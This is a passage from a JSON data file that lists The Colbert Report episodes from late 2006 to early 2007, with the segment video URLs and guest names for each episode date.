        "http://thecolbertreport.cc.com/videos/wze0m8/the-word---back-off--old-man",
        "http://thecolbertreport.cc.com/videos/3l0etr/tip-wag---quitters-edition",
        "http://thecolbertreport.cc.com/videos/v04ko8/dan-rather",
        "http://thecolbertreport.cc.com/videos/39thdv/alpha-dog-of-the-week---ronald-reagan"
      ],
      "guest": "Dan Rather"
    },
    {
      "date": "2006-11-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2xysq8/intro---10-14-06",
        "http://thecolbertreport.cc.com/videos/41uzjx/lesbian-roles",
        "http://thecolbertreport.cc.com/videos/njn4f1/stephen-jr--in-canada",
        "http://thecolbertreport.cc.com/videos/x9bnw7/the-word---expecting",
        "http://thecolbertreport.cc.com/videos/mx7sjh/vote-for-gail-jingle",
        "http://thecolbertreport.cc.com/videos/xokq2b/jeff-swartz",
        "http://thecolbertreport.cc.com/videos/cnxqlb/kid-activity-corner---nancy-pelosi-hand-turkeys"
      ],
      "guest": "Jeff Swartz"
    },
    {
      "date": "2006-11-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9sc11a/exclusive---better-know-a-founder---thomas-jefferson",
        "http://thecolbertreport.cc.com/videos/2xysq8/intro---10-14-06",
        "http://thecolbertreport.cc.com/videos/41uzjx/lesbian-roles",
        "http://thecolbertreport.cc.com/videos/njn4f1/stephen-jr--in-canada",
        "http://thecolbertreport.cc.com/videos/x9bnw7/the-word---expecting",
        "http://thecolbertreport.cc.com/videos/mx7sjh/vote-for-gail-jingle",
        "http://thecolbertreport.cc.com/videos/xokq2b/jeff-swartz",
        "http://thecolbertreport.cc.com/videos/cnxqlb/kid-activity-corner---nancy-pelosi-hand-turkeys"
      ],
      "guest": "Al Franken, Dr. Michael Novacek"
    },
    {
      "date": "2006-11-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zmp3r0/intro---11-15-06",
        "http://thecolbertreport.cc.com/videos/kl1xl0/rush-limbaugh-s-comments",
        "http://thecolbertreport.cc.com/videos/w5bgh2/democrats--victory-dance---al-franken",
        "http://thecolbertreport.cc.com/videos/47a505/better-know-a-founder---thomas-jefferson",
        "http://thecolbertreport.cc.com/videos/cnf5lf/mike-novacek"
      ],
      "guest": "Al Franken, Dr. Michael Novacek"
    },
    {
      "date": "2006-11-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hstabl/intro---11-16-06",
        "http://thecolbertreport.cc.com/videos/zyzp0g/minority-whip",
        "http://thecolbertreport.cc.com/videos/euzyuf/sexiest-man-alive",
        "http://thecolbertreport.cc.com/videos/olggdr/the-word---play-ball-",
        "http://thecolbertreport.cc.com/videos/oplysq/movies-that-are-destroying-america---xmas",
        "http://thecolbertreport.cc.com/videos/3il1eo/richard-linklater",
        "http://thecolbertreport.cc.com/videos/s716ap/sign-off---strawberry"
      ],
      "guest": "Richard Linklater"
    },
    {
      "date": "2006-11-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1xjoh6/intro---11-27-06",
        "http://thecolbertreport.cc.com/videos/z4h5jm/putin--08",
        "http://thecolbertreport.cc.com/videos/k3p09y/tivo-cleaning",
        "http://thecolbertreport.cc.com/videos/dg34l1/the-word---jacksquat",
        "http://thecolbertreport.cc.com/videos/ckqxms/threatdown---100-hoops",
        "http://thecolbertreport.cc.com/videos/lqdkhe/jim-lehrer",
        "http://thecolbertreport.cc.com/videos/y3zgee/sign-off---love"
      ],
      "guest": "Jim Lehrer"
    },
    {
      "date": "2006-11-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0tspod/intro---11-28-06",
        "http://thecolbertreport.cc.com/videos/47xxe1/who-s-honoring-me-now----gq",
        "http://thecolbertreport.cc.com/videos/voj40k/the-word---ecu-menace",
        "http://thecolbertreport.cc.com/videos/fenw0v/alabama-miracle---helen-keller-museum",
        "http://thecolbertreport.cc.com/videos/xi41md/harry-shearer",
        "http://thecolbertreport.cc.com/videos/iate4s/sign-off---exceptional-audience"
      ],
      "guest": "Harry Shearer"
    },
    {
      "date": "2006-11-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mr063e/intro---11-29-06",
        "http://thecolbertreport.cc.com/videos/wanzdw/who-s-riding-my-coattails-now----jeopardy",
        "http://thecolbertreport.cc.com/videos/bp43w6/the-word---killing-two-birds",
        "http://thecolbertreport.cc.com/videos/49jjmd/alabama-miracle---the-stephen-colbert-museum---gift-shop--grand-opening",
        "http://thecolbertreport.cc.com/videos/8rjs2g/nora-ephron"
      ],
      "guest": "Nora Ephron"
    },
    {
      "date": "2006-11-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wzpzqs/intro---11-30-06",
        "http://thecolbertreport.cc.com/videos/4c2tdv/vilsack-attack",
        "http://thecolbertreport.cc.com/videos/z88s3n/p-k--winsome---if-p-k--winsome-did-it",
        "http://thecolbertreport.cc.com/videos/0inrmr/colbert-nation-merchandise",
        "http://thecolbertreport.cc.com/videos/jotybg/alabama-miracle---the-morning-after",
        "http://thecolbertreport.cc.com/videos/hv1lim/mike-lupica",
        "http://thecolbertreport.cc.com/videos/k1wdp2/sign-off---wall-notch"
      ],
      "guest": "Mike Lupica"
    },
    {
      "date": "2006-12-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9s5cs9/intro---12-4-06",
        "http://thecolbertreport.cc.com/videos/ozd0a8/sherman-wedding",
        "http://thecolbertreport.cc.com/videos/sjup2k/the-word---american-orthodox",
        "http://thecolbertreport.cc.com/videos/shtpb9/tip-wag---christmas",
        "http://thecolbertreport.cc.com/videos/tc5d1m/will-wright",
        "http://thecolbertreport.cc.com/videos/xpx8ua/sign-off---extra-special-comment---tie-stain"
      ],
      "guest": "Will Wright"
    },
    {
      "date": "2006-12-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/z40k91/intro---12-5-06",
        "http://thecolbertreport.cc.com/videos/6ixmt6/-return--to-the-moon",
        "http://thecolbertreport.cc.com/videos/mz0h4p/robert-gates--confirmation",
        "http://thecolbertreport.cc.com/videos/msrwcg/the-word---honest-injun",
        "http://thecolbertreport.cc.com/videos/3odbkp/sport-report---coach-mancini",
        "http://thecolbertreport.cc.com/videos/tjdbeu/sign-off---number-one-source",
        "http://thecolbertreport.cc.com/videos/c1sa92/steven-levitt"
      ],
      "guest": "Steven D. Levitt"
    },
    {
      "date": "2006-12-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fe08hq/intro---12-6-06",
        "http://thecolbertreport.cc.com/videos/oamjbp/life-size-nativity",
        "http://thecolbertreport.cc.com/videos/ikcmp0/mary-cheney",
        "http://thecolbertreport.cc.com/videos/4fr9o9/the-word---words",
        "http://thecolbertreport.cc.com/videos/76wnkt/tek-jansen---tek-the-halls",
        "http://thecolbertreport.cc.com/videos/0wqkww/john-sexton",
        "http://thecolbertreport.cc.com/videos/8suoui/sign-off---cardboard-box"
      ],
      "guest": "John Sexton"
    },
    {
      "date": "2006-12-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/k9wcbv/intro---12-7-06",
        "http://thecolbertreport.cc.com/videos/ebabt9/david-gregory",
        "http://thecolbertreport.cc.com/videos/kvccyn/the-word---case-closed",
        "http://thecolbertreport.cc.com/videos/tk750r/elizabeth-de-la-vega",
        "http://thecolbertreport.cc.com/videos/dntxcy/green-screen-challenge---counter-challenge",
        "http://thecolbertreport.cc.com/videos/4koanp/alpha-dog-of-the-week---john-bolton",
        "http://thecolbertreport.cc.com/videos/dqyz7h/francis-collins",
        "http://thecolbertreport.cc.com/videos/rqe98q/sign-off---tgit"
      ],
      "guest": "Dr. Francis S. Collins"
    },
    {
      "date": "2006-12-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ri4vbo/intro---12-11-06",
        "http://thecolbertreport.cc.com/videos/t0abnh/defending-rosie",
        "http://thecolbertreport.cc.com/videos/uea9ov/jack-kingston",
        "http://thecolbertreport.cc.com/videos/k0a3hu/the-white-christmas-album",
        "http://thecolbertreport.cc.com/videos/2cea2e/threatdown---christmas-style",
        "http://thecolbertreport.cc.com/videos/bqpkoy/peter-singer",
        "http://thecolbertreport.cc.com/videos/5alg6c/got-your-back"
      ],
      "guest": "Dr. Peter Singer"
    },
    {
      "date": "2006-12-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/35u0ts/intro---12-12-06",
        "http://thecolbertreport.cc.com/videos/kn0mlp/augusto-pinochet-s-coup",
        "http://thecolbertreport.cc.com/videos/dctycd/shout-out----beef-hammer-flag",
        "http://thecolbertreport.cc.com/videos/1o4xvk/the-word---casualty-of-war",
        "http://thecolbertreport.cc.com/videos/e1504w/who-s-honoring-me-now----merriam-webster-s-word-of-the-year",
        "http://thecolbertreport.cc.com/videos/xd9itr/better-know-a-district---new-members-of-congress-at-the-kennedy-school",
        "http://thecolbertreport.cc.com/videos/j01zz1/dan-savage",
        "http://thecolbertreport.cc.com/videos/s3gs7u/sign-off---post-show-taco-bell-chalupa-chow-down"
      ],
      "guest": "Dan Savage"
    },
    {
      "date": "2006-12-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6ohkja/intro---12-13-06",
        "http://thecolbertreport.cc.com/videos/yl018s/stephen-jr--s-christmas-miracle",
        "http://thecolbertreport.cc.com/videos/suc40d/the-word---it-s-a-small-world",
        "http://thecolbertreport.cc.com/videos/5uk9gs/replenishing-the-eggnog-supply",
        "http://thecolbertreport.cc.com/videos/d0ml1u/sea-tac-s-christmas-trees-restored",
        "http://thecolbertreport.cc.com/videos/x1f8dg/doris-kearns-goodwin",
        "http://thecolbertreport.cc.com/videos/0kcywr/charge-me-twice-for-stephen"
      ],
      "guest": "Doris Kearns Goodwin"
    },
    {
      "date": "2006-12-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lwojc9/intro---12-14-06",
        "http://thecolbertreport.cc.com/videos/3moulc/finger-strengthening",
        "http://thecolbertreport.cc.com/videos/5dvej7/the-american-people-are-to-blame",
        "http://thecolbertreport.cc.com/videos/60ds73/the-word---clarity",
        "http://thecolbertreport.cc.com/videos/klp05i/blood-in-the-water---bruce-tinsley-s-dui",
        "http://thecolbertreport.cc.com/videos/wauy3f/caesar-honeybee-or-tyrone-hunnibi-",
        "http://thecolbertreport.cc.com/videos/yaoen5/daniel-pinchbeck",
        "http://thecolbertreport.cc.com/videos/ua9gte/letter-to-representative-jack-kingston"
      ],
      "guest": "Daniel Pinchbeck"
    },
    {
      "date": "2006-12-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/t66x66/intro---12-18-06",
        "http://thecolbertreport.cc.com/videos/j56gn9/diy-cold-medicine",
        "http://thecolbertreport.cc.com/videos/ndrsqu/profiles-in-balls",
        "http://thecolbertreport.cc.com/videos/mv0dai/the-word---the-draft",
        "http://thecolbertreport.cc.com/videos/c4vji3/tip-wag---art-edition",
        "http://thecolbertreport.cc.com/videos/nnpc32/jack-welch",
        "http://thecolbertreport.cc.com/videos/yy82av/the-jingle-terns"
      ],
      "guest": "Jack Welch"
    },
    {
      "date": "2006-12-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/an4q7j/intro---12-19-06",
        "http://thecolbertreport.cc.com/videos/q9o6sw/person-of-the-year",
        "http://thecolbertreport.cc.com/videos/qh5kz9/stephen-goes-to-harvard",
        "http://thecolbertreport.cc.com/videos/v81egv/deepak-chopra",
        "http://thecolbertreport.cc.com/videos/3fhkpv/face-off-preview",
        "http://thecolbertreport.cc.com/videos/kza2d8/the-word---tit-for-tat"
      ],
      "guest": "Deepak Chopra"
    },
    {
      "date": "2006-12-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ouau0r/intro---12-20-06",
        "http://thecolbertreport.cc.com/videos/8t5vas/rock-and-awe--countdown-to-guitarmageddon",
        "http://thecolbertreport.cc.com/videos/lyahfg/shreddown",
        "http://thecolbertreport.cc.com/videos/iocz1g/chris-funk",
        "http://thecolbertreport.cc.com/videos/4hpbzt/peter-frampton",
        "http://thecolbertreport.cc.com/videos/m75mj9/shreddown---the-judgment"
      ],
      "guest": "Howard Zinn"
    }
  ],
  "2007": [
    {
      "date": "2007-01-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/35rb23/intro---1-8-07",
        "http://thecolbertreport.cc.com/videos/liauyt/the-gallotastic-executacular---hangin--with-mr--hussein",
        "http://thecolbertreport.cc.com/videos/2eciiy/the-word---facts",
        "http://thecolbertreport.cc.com/videos/vfxu06/who-s-attacking-me-now----lake-superior-state-university",
        "http://thecolbertreport.cc.com/videos/ya0sji/who-s-honoring-me-now----gay-com",
        "http://thecolbertreport.cc.com/videos/uuhxlg/stephen-s-sound-advice---surviving-the-winter-blues",
        "http://thecolbertreport.cc.com/videos/duytly/ethan-nadelmann"
      ],
      "guest": "Ethan Nadelmann"
    },
    {
      "date": "2007-01-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/oxq1cl/not-a-sex-scandal",
        "http://thecolbertreport.cc.com/videos/rsuyoo/intro---1-9-07",
        "http://thecolbertreport.cc.com/videos/a9e13e/the-word---texas-hold--em",
        "http://thecolbertreport.cc.com/videos/bmmv86/ohio-state-loses",
        "http://thecolbertreport.cc.com/videos/1yhdmp/we-the-mediator---celebrity-feuds",
        "http://thecolbertreport.cc.com/videos/ezqjm4/jim-cramer",
        "http://thecolbertreport.cc.com/videos/q6rkb3/sign-off---farewell--james-brown"
      ],
      "guest": "Jim Cramer"
    },
    {
      "date": "2007-01-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/b3d5l1/intro---1-10-07",
        "http://thecolbertreport.cc.com/videos/j5htgu/president-s-speech",
        "http://thecolbertreport.cc.com/videos/crgbvq/invasion-of-the-country-snatchers",
        "http://thecolbertreport.cc.com/videos/ie5gtu/the-word---worry",
        "http://thecolbertreport.cc.com/videos/048s3c/tek-jansen---hounds-of-hell--ragtime-billy-peaches",
        "http://thecolbertreport.cc.com/videos/ku9y06/david-kamp",
        "http://thecolbertreport.cc.com/videos/9nuye7/sign-off---thawing-meat"
      ],
      "guest": "David Kamp"
    },
    {
      "date": "2007-01-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/21xsg9/intro---1-11-07",
        "http://thecolbertreport.cc.com/videos/nhwjcd/what-number-is-stephen-thinking-of----doubled-up",
        "http://thecolbertreport.cc.com/videos/7v6i3c/ken-roth",
        "http://thecolbertreport.cc.com/videos/jxfsrm/tip-wag---science-and-technology",
        "http://thecolbertreport.cc.com/videos/fxnp1o/judy-woodruff"
      ],
      "guest": "Judy Woodruff"
    },
    {
      "date": "2007-01-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tpjoll/intro---1-15-07",
        "http://thecolbertreport.cc.com/videos/bemyqb/inspired-by-dr--king",
        "http://thecolbertreport.cc.com/videos/ni7g5j/a-man-s-touch",
        "http://thecolbertreport.cc.com/videos/xb55y0/the-word---victory-",
        "http://thecolbertreport.cc.com/videos/eamlaf/bears---balls---gas",
        "http://thecolbertreport.cc.com/videos/o7xhwp/alex-kuczynski"
      ],
      "guest": "Alex Kuczynski"
    },
    {
      "date": "2007-01-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/795pdp/intro---1-16-07",
        "http://thecolbertreport.cc.com/videos/ycpx4s/squeaky-chair",
        "http://thecolbertreport.cc.com/videos/r7kinv/pesos-for-pizza",
        "http://thecolbertreport.cc.com/videos/hwlhus/the-word---symbolic",
        "http://thecolbertreport.cc.com/videos/6q6sy0/sport-report---bend-it-like-beckham",
        "http://thecolbertreport.cc.com/videos/2tdkm8/dinesh-d-souza"
      ],
      "guest": "Dinesh D'Souza"
    },
    {
      "date": "2007-01-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ufcy26/intro---1-17-07",
        "http://thecolbertreport.cc.com/videos/8amkmh/200th-episode",
        "http://thecolbertreport.cc.com/videos/wjuko4/lynn-swann",
        "http://thecolbertreport.cc.com/videos/xv8tlv/better-know-a-district---washington-s-3rd---brian-baird",
        "http://thecolbertreport.cc.com/videos/1qdsbp/richard-clarke"
      ],
      "guest": "Richard Clarke"
    },
    {
      "date": "2007-01-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/z0tcp1/intro---1-18-07",
        "http://thecolbertreport.cc.com/videos/kyc2cd/the-advent-of-o-reilly",
        "http://thecolbertreport.cc.com/videos/qtrfgo/the-word---go-it-alone",
        "http://thecolbertreport.cc.com/videos/dre6df/we-the-mediator---trump-v--o-donnell",
        "http://thecolbertreport.cc.com/videos/9seimt/bill-o-reilly",
        "http://thecolbertreport.cc.com/videos/cuouel/o-reilly-s-microwave"
      ],
      "guest": "Bill O'Reilly"
    },
    {
      "date": "2007-01-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9vl9tx/intro---1-22-07",
        "http://thecolbertreport.cc.com/videos/1t56vq/the-bears",
        "http://thecolbertreport.cc.com/videos/itbxtv/who-s-riding-my-coattails-now----terence-koh",
        "http://thecolbertreport.cc.com/videos/mfzk22/the-word---exact-words",
        "http://thecolbertreport.cc.com/videos/opisk9/balls-for-kidz---gambling",
        "http://thecolbertreport.cc.com/videos/rnd3lf/tom-schaller",
        "http://thecolbertreport.cc.com/videos/6mgw6m/sign-off---zeppelin-reunion"
      ],
      "guest": "Tom Schaller"
    },
    {
      "date": "2007-01-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xjsnlx/intro---1-23-07",
        "http://thecolbertreport.cc.com/videos/ebff8o/pre-tape",
        "http://thecolbertreport.cc.com/videos/vm00zm/lieber-vs--lieber",
        "http://thecolbertreport.cc.com/videos/jv328p/threatdown---the-weather-channel",
        "http://thecolbertreport.cc.com/videos/y849ls/michael-steele",
        "http://thecolbertreport.cc.com/videos/xxwpqf/wednesday-today"
      ],
      "guest": "Michael Steele"
    },
    {
      "date": "2007-01-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/goh39c/intro---1-24-07",
        "http://thecolbertreport.cc.com/videos/gzqy8i/state-of-the-union---cheney-wins",
        "http://thecolbertreport.cc.com/videos/e17mq9/the-word---great-news",
        "http://thecolbertreport.cc.com/videos/3525mn/better-know-a-district---pennsylvania-s-4th---jason-altmire",
        "http://thecolbertreport.cc.com/videos/r5j10b/lou-dobbs"
      ],
      "guest": "Lou Dobbs"
    },
    {
      "date": "2007-01-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/n139mj/intro---1-25-07",
        "http://thecolbertreport.cc.com/videos/7z0x1m/right-away-",
        "http://thecolbertreport.cc.com/videos/5rmbin/the-word---smafu",
        "http://thecolbertreport.cc.com/videos/hkzk11/sport-report---more-with-coach-mancini",
        "http://thecolbertreport.cc.com/videos/tufln6/mike-wallace"
      ],
      "guest": "Mike Wallace"
    },
    {
      "date": "2007-01-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/o0maxx/intro---1-29-07",
        "http://thecolbertreport.cc.com/videos/1m6mdm/new-york-grieves",
        "http://thecolbertreport.cc.com/videos/z0b9vz/stephen-colbert-day",
        "http://thecolbertreport.cc.com/videos/6p6df7/the-word---wikilobbying",
        "http://thecolbertreport.cc.com/videos/11js13/tip-wag---tom-cruise",
        "http://thecolbertreport.cc.com/videos/zqi973/barry-lando"
      ],
      "guest": "Barry M. Lando"
    },
    {
      "date": "2007-01-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/np3o3k/intro---1-30-07",
        "http://thecolbertreport.cc.com/videos/j1sd5a/new-military-weapon",
        "http://thecolbertreport.cc.com/videos/cv6q8o/david-leonhardt",
        "http://thecolbertreport.cc.com/videos/ttzs6x/caviar-omelets-for-the-troops",
        "http://thecolbertreport.cc.com/videos/bsbad5/judge--jury---executioner---adultery",
        "http://thecolbertreport.cc.com/videos/eyhp38/donna-shalala",
        "http://thecolbertreport.cc.com/videos/dwv24s/sign-off---microwave-gift-to-o-reilly"
      ],
      "guest": "Donna Shalala"
    },
    {
      "date": "2007-01-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/84e6zh/exclusive---better-know-a-district---new-york-s-6th---gregory-meeks",
        "http://thecolbertreport.cc.com/videos/4mp2yh/intro---1-31-07",
        "http://thecolbertreport.cc.com/videos/v1la3q/global-warming",
        "http://thecolbertreport.cc.com/videos/3emlxq/on-notice---jane-fonda-fantasies",
        "http://thecolbertreport.cc.com/videos/qg7l5c/the-word---black-sheep",
        "http://thecolbertreport.cc.com/videos/4lodkc/better-know-a-district---new-york-s-6th---gregory-meeks",
        "http://thecolbertreport.cc.com/videos/npjb41/jed-babbin"
      ],
      "guest": "Jed Babbin"
    },
    {
      "date": "2007-02-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/89lmed/intro---2-1-07",
        "http://thecolbertreport.cc.com/videos/mzq0ue/cartoon-terrorism",
        "http://thecolbertreport.cc.com/videos/492fjx/ending-racism",
        "http://thecolbertreport.cc.com/videos/rbb68f/the-word---we-shall-overcome",
        "http://thecolbertreport.cc.com/videos/2m3ntu/movies-that-are-destroying-america---oscars-edition",
        "http://thecolbertreport.cc.com/videos/s2k3ll/chuck-schumer",
        "http://thecolbertreport.cc.com/videos/b1j62r/the-most-poetic-f--king-thing-i-ve-ever-heard"
      ],
      "guest": "Sen. Chuck Schumer"
    },
    {
      "date": "2007-02-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qonzal/intro---2-5-07",
        "http://thecolbertreport.cc.com/videos/raqy45/peyton-manseed",
        "http://thecolbertreport.cc.com/videos/1ppbxw/save-stephen-jr-",
        "http://thecolbertreport.cc.com/videos/pkx5sp/the-word---second-opinion",
        "http://thecolbertreport.cc.com/videos/cu6q1h/threatdown---giant-mexican-babies",
        "http://thecolbertreport.cc.com/videos/qj7ov5/wendy-kopp"
      ],
      "guest": "Wendy Kopp"
    },
    {
      "date": "2007-02-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/irg0ck/exclusive---better-know-a-district---ohio-s-18th---zack-space-pt--1",
        "http://thecolbertreport.cc.com/videos/7vpqnl/exclusive---better-know-a-district---ohio-s-18th---zack-space-pt--2",
        "http://thecolbertreport.cc.com/videos/w05aan/intro---2-6-07",
        "http://thecolbertreport.cc.com/videos/rirgzz/pray-for-stephen",
        "http://thecolbertreport.cc.com/videos/ronvu0/the-word---making-a-killing",
        "http://thecolbertreport.cc.com/videos/sh2kz6/better-know-a-district---ohio-s-18th---zack-space",
        "http://thecolbertreport.cc.com/videos/vnbq6e/charles-leduff"
      ],
      "guest": "Charlie LeDuff"
    },
    {
      "date": "2007-02-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lh3p6z/intro---2-7-07",
        "http://thecolbertreport.cc.com/videos/skowle/the-san-francisco-treat",
        "http://thecolbertreport.cc.com/videos/hx3kkt/california-values-watch",
        "http://thecolbertreport.cc.com/videos/fykjnf/the-word---silence",
        "http://thecolbertreport.cc.com/videos/pp2kiz/tek-jansen---from-the-future",
        "http://thecolbertreport.cc.com/videos/n36pgb/steven-pinker"
      ],
      "guest": "Steven Pinker"
    },
    {
      "date": "2007-02-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5l6ygo/intro---2-8-07",
        "http://thecolbertreport.cc.com/videos/btxrus/space-madness",
        "http://thecolbertreport.cc.com/videos/q5bcg9/stephen-for-president---a-sign",
        "http://thecolbertreport.cc.com/videos/12d71h/debra-dickerson",
        "http://thecolbertreport.cc.com/videos/ls3y3l/was-it-really-that-bad----salem-witch-trials",
        "http://thecolbertreport.cc.com/videos/m5tx4f/chris-hedges"
      ],
      "guest": "Chris Hedges"
    },
    {
      "date": "2007-02-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/sudz5h/intro---2-12-07",
        "http://thecolbertreport.cc.com/videos/cvs0b4/the-word---inappropriate",
        "http://thecolbertreport.cc.com/videos/wetex5/tip-wag---john-howard",
        "http://thecolbertreport.cc.com/videos/ovmu6y/michael-oppenheimer",
        "http://thecolbertreport.cc.com/videos/gbc95s/alpha-dog-of-the-week---amitabh-bachchan"
      ],
      "guest": "Michael Oppenheimer"
    },
    {
      "date": "2007-02-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7zlyvc/the-word---apocalypse-mao--murdered-by-the-orient-s-success---frenemy",
        "http://thecolbertreport.cc.com/videos/dh1nxa/apocalypse-mao--murdered-by-the-orient-s-success---take-the-pulse",
        "http://thecolbertreport.cc.com/videos/cbgmhg/sheryl-wudunn",
        "http://thecolbertreport.cc.com/videos/rewkbj/apocalypse-mao--murdered-by-the-orient-s-success---eight-child-policy"
      ],
      "guest": "Sheryl WuDunn"
    },
    {
      "date": "2007-02-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0unos7/catching-up-with-china",
        "http://thecolbertreport.cc.com/videos/sv6om5/safe-sex-for-senior-citizens",
        "http://thecolbertreport.cc.com/videos/qngp8d/the-word---bad-medicine",
        "http://thecolbertreport.cc.com/videos/e7leqz/stephen-protects-valentine-s-day",
        "http://thecolbertreport.cc.com/videos/npsgvg/sport-report---westminster-kennel-club-dog-show",
        "http://thecolbertreport.cc.com/videos/tv0pg5/lance-armstrong",
        "http://thecolbertreport.cc.com/videos/4zrnjn/intro---2-14-07"
      ],
      "guest": "Lance Armstrong"
    },
    {
      "date": "2007-02-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bemh6r/intro---2-15-07",
        "http://thecolbertreport.cc.com/videos/5h0hc1/the-365-most-influential-cultural-figures-of-2007---j-j--abrams",
        "http://thecolbertreport.cc.com/videos/dv94hn/helen-thomas-s-chair",
        "http://thecolbertreport.cc.com/videos/xsukru/the-365-most-influential-cultural-figures-of-2007---candice-bergen",
        "http://thecolbertreport.cc.com/videos/gxjtk4/better-know-a-district---arkansas--2nd---vic-snyder",
        "http://thecolbertreport.cc.com/videos/htsqly/shashi-tharoor"
      ],
      "guest": "Shashi Tharoor"
    },
    {
      "date": "2007-02-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7kzllg/intro---2-26-07",
        "http://thecolbertreport.cc.com/videos/6q3fey/the-word---success",
        "http://thecolbertreport.cc.com/videos/liy97p/stephen-s-sound-advice---avoiding-humiliation-on-the-campaign-trail",
        "http://thecolbertreport.cc.com/videos/rj64v2/zev-chafets",
        "http://thecolbertreport.cc.com/videos/lto66u/sign-off---the-stupidest-person-in-the-world"
      ],
      "guest": "Zev Chafets"
    },
    {
      "date": "2007-02-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/m6llmb/intro---2-27-07",
        "http://thecolbertreport.cc.com/videos/4q8yqr/gore-s-garbage",
        "http://thecolbertreport.cc.com/videos/08vl33/the-word---recoil",
        "http://thecolbertreport.cc.com/videos/kyuvud/dead-to-me---raptors",
        "http://thecolbertreport.cc.com/videos/a5eovz/tip-wag---bilk",
        "http://thecolbertreport.cc.com/videos/xtu2o9/craig-venter"
      ],
      "guest": "Dr. Craig Venter"
    },
    {
      "date": "2007-02-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/k64d0x/intro---2-28-07",
        "http://thecolbertreport.cc.com/videos/94efgl/david-geffen-the-intern-",
        "http://thecolbertreport.cc.com/videos/ax1yhn/obama-vs--colbert",
        "http://thecolbertreport.cc.com/videos/2j1fug/profiles-in-quitters---tom-vilsack",
        "http://thecolbertreport.cc.com/videos/2w1ttr/problems-without-solutions--stay-at-home-dads",
        "http://thecolbertreport.cc.com/videos/rjcwpq/nina-jablonski"
      ],
      "guest": "Nina Jablonski"
    },
    {
      "date": "2007-03-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uvhlbh/intro---3-1-07",
        "http://thecolbertreport.cc.com/videos/dnoicn/jesus--1-",
        "http://thecolbertreport.cc.com/videos/09pfnw/the-word---bury-the-lead",
        "http://thecolbertreport.cc.com/videos/xp8ghf/better-know-a-district---tennessee-s-9th---steve-cohen",
        "http://thecolbertreport.cc.com/videos/hdb72u/larry-king",
        "http://thecolbertreport.cc.com/videos/din9ey/sign-off---all-the-time"
      ],
      "guest": "Larry King"
    },
    {
      "date": "2007-03-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/s5zpws/intro---3-5-07",
        "http://thecolbertreport.cc.com/videos/f0veng/stop-the-war-in-congress",
        "http://thecolbertreport.cc.com/videos/9rmkm6/ben-and-jerry---introducing-americone-dream",
        "http://thecolbertreport.cc.com/videos/erco0p/bears---balls---bees",
        "http://thecolbertreport.cc.com/videos/w9i285/mara-vanderslice",
        "http://thecolbertreport.cc.com/videos/u5x46t/sign-off---you-get-a-pint-"
      ],
      "guest": "Mara Vanderslice, Ben and Jerry"
    },
    {
      "date": "2007-03-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jokvk3/intro---3-6-07",
        "http://thecolbertreport.cc.com/videos/987dug/stephen-wins-the-lottery",
        "http://thecolbertreport.cc.com/videos/5xpqn0/libby-verdict",
        "http://thecolbertreport.cc.com/videos/yjwisn/the-word---wwjd",
        "http://thecolbertreport.cc.com/videos/ryt5zt/threatdown---cheney-s-clot",
        "http://thecolbertreport.cc.com/videos/d9k0w9/mark-frauenfelder"
      ],
      "guest": "Mark Frauenfelder"
    },
    {
      "date": "2007-03-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/t3l2qk/intro---3-7-07",
        "http://thecolbertreport.cc.com/videos/o5rj01/mega-millions",
        "http://thecolbertreport.cc.com/videos/f4wilr/the-word---don-t",
        "http://thecolbertreport.cc.com/videos/mw47n3/easter-under-attack---bunny",
        "http://thecolbertreport.cc.com/videos/k8n6ln/michael-spector",
        "http://thecolbertreport.cc.com/videos/eu60l7/sign-off---colbert-savings-time"
      ],
      "guest": "Michael Specter"
    },
    {
      "date": "2007-03-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hdanpb/exclusive---better-know-a-district---kentucky-s-3rd---john-yarmuth-pt--1",
